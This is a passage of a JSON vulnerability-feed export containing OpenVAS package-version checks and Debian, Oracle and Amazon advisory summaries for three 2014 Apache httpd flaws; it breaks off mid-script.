(resource\nconsumption) via crafted request data that decompresses to a much\nlarger size.\n\nCVE-2014-0226\nA race condition was found in mod_status. An attacker able to\naccess a public server status page on a server could send carefully\ncrafted requests which could lead to a heap buffer overflow,\ncausing denial of service, disclosure of sensitive information, or\npotentially the execution of arbitrary code.\n\nCVE-2014-0231\nA flaw was found in mod_cgid. If a server using mod_cgid hosted\nCGI scripts which did not consume standard input, a remote attacker\ncould cause child processes to hang indefinitely, leading to denial\nof service.", "modified": "2019-03-19T00:00:00", "published": "2014-07-24T00:00:00", "id": "OPENVAS:1361412562310702989", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702989", "type": "openvas", "title": "Debian Security Advisory DSA 2989-1 (apache2 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2989.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 2989-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702989\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_name(\"Debian Security Advisory DSA 2989-1 (apache2 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-24 00:00:00 +0200 (Thu, 24 Jul 2014)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2989.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"apache2 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), these problems have been fixed in\nversion 2.2.22-13+deb7u3.\n\nFor the testing distribution (jessie), these problems will be fixed in\nversion 2.4.10-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.4.10-1.\n\nWe recommend that you upgrade your apache2 packages.\");\n script_tag(name:\"summary\", value:\"Several security issues were found in the Apache HTTP server.\n\nCVE-2014-0118\nThe DEFLATE input filter (inflates request bodies) in mod_deflate\nallows remote attackers to cause a denial of service 
(resource\nconsumption) via crafted request data that decompresses to a much\nlarger size.\n\nCVE-2014-0226\nA race condition was found in mod_status. An attacker able to\naccess a public server status page on a server could send carefully\ncrafted requests which could lead to a heap buffer overflow,\ncausing denial of service, disclosure of sensitive information, or\npotentially the execution of arbitrary code.\n\nCVE-2014-0231\nA flaw was found in mod_cgid. If a server using mod_cgid hosted\nCGI scripts which did not consume standard input, a remote attacker\ncould cause child processes to hang indefinitely, leading to denial\nof service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", 
ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-27T10:48:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "Several security issues were found in the Apache HTTP server.\n\nCVE-2014-0118 \nThe DEFLATE input filter (inflates request bodies) in mod_deflate\nallows remote attackers to cause a denial of service (resource\nconsumption) via crafted request data that decompresses to a much\nlarger size.\n\nCVE-2014-0226 \nA race condition was found in mod_status. An attacker able to\naccess a public server status page on a server could send carefully\ncrafted requests which could lead to a heap buffer overflow,\ncausing denial of service, disclosure of sensitive information, or\npotentially the execution of arbitrary code.\n\nCVE-2014-0231 \nA flaw was found in mod_cgid. 
If a server using mod_cgid hosted\nCGI scripts which did not consume standard input, a remote attacker\ncould cause child processes to hang indefinitely, leading to denial\nof service.", "modified": "2017-07-12T00:00:00", "published": "2014-07-24T00:00:00", "id": "OPENVAS:702989", "href": "http://plugins.openvas.org/nasl.php?oid=702989", "type": "openvas", "title": "Debian Security Advisory DSA 2989-1 (apache2 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2989.nasl 6692 2017-07-12 09:57:43Z teissa $\n# Auto-generated from advisory DSA 2989-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"apache2 on Debian Linux\";\ntag_insight = \"The Apache Software Foundation's goal is to build a secure, efficient and\nextensible HTTP server as standards-compliant open source software. 
The\nresult has long been the number one web server on the Internet.\";\ntag_solution = \"For the stable distribution (wheezy), these problems have been fixed in\nversion 2.2.22-13+deb7u3.\n\nFor the testing distribution (jessie), these problems will be fixed in\nversion 2.4.10-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.4.10-1.\n\nWe recommend that you upgrade your apache2 packages.\";\ntag_summary = \"Several security issues were found in the Apache HTTP server.\n\nCVE-2014-0118 \nThe DEFLATE input filter (inflates request bodies) in mod_deflate\nallows remote attackers to cause a denial of service (resource\nconsumption) via crafted request data that decompresses to a much\nlarger size.\n\nCVE-2014-0226 \nA race condition was found in mod_status. An attacker able to\naccess a public server status page on a server could send carefully\ncrafted requests which could lead to a heap buffer overflow,\ncausing denial of service, disclosure of sensitive information, or\npotentially the execution of arbitrary code.\n\nCVE-2014-0231 \nA flaw was found in mod_cgid. 
If a server using mod_cgid hosted\nCGI scripts which did not consume standard input, a remote attacker\ncould cause child processes to hang indefinitely, leading to denial\nof service.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702989);\n script_version(\"$Revision: 6692 $\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_name(\"Debian Security Advisory DSA 2989-1 (apache2 - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-12 11:57:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-07-24 00:00:00 +0200 (Thu, 24 Jul 2014)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2989.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dbg\", 
ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != 
NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", 
ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "Oracle Linux Local Security Checks ELSA-2014-0920", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123366", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123366", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-0920", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-0920.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be 
useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123366\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:02:50 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-0920\");\n script_tag(name:\"insight\", value:\"ELSA-2014-0920 - httpd security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-0920\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-0920.html\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~87.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~87.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~87.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~87.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~31.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~31.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~31.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~31.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~31.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T23:01:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", 
"id": "OPENVAS:1361412562310120104", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120104", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-389)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120104\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:17:31 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-389)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in the Apache HTTP server. 
Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update httpd24 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-389.html\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"mod24_proxy_html\", rpm:\"mod24_proxy_html~2.4.10~1.59.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd24\", rpm:\"httpd24~2.4.10~1.59.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd24-debuginfo\", rpm:\"httpd24-debuginfo~2.4.10~1.59.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod24_ldap\", rpm:\"mod24_ldap~2.4.10~1.59.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd24-tools\", rpm:\"httpd24-tools~2.4.10~1.59.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod24_ssl\", rpm:\"mod24_ssl~2.4.10~1.59.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = 
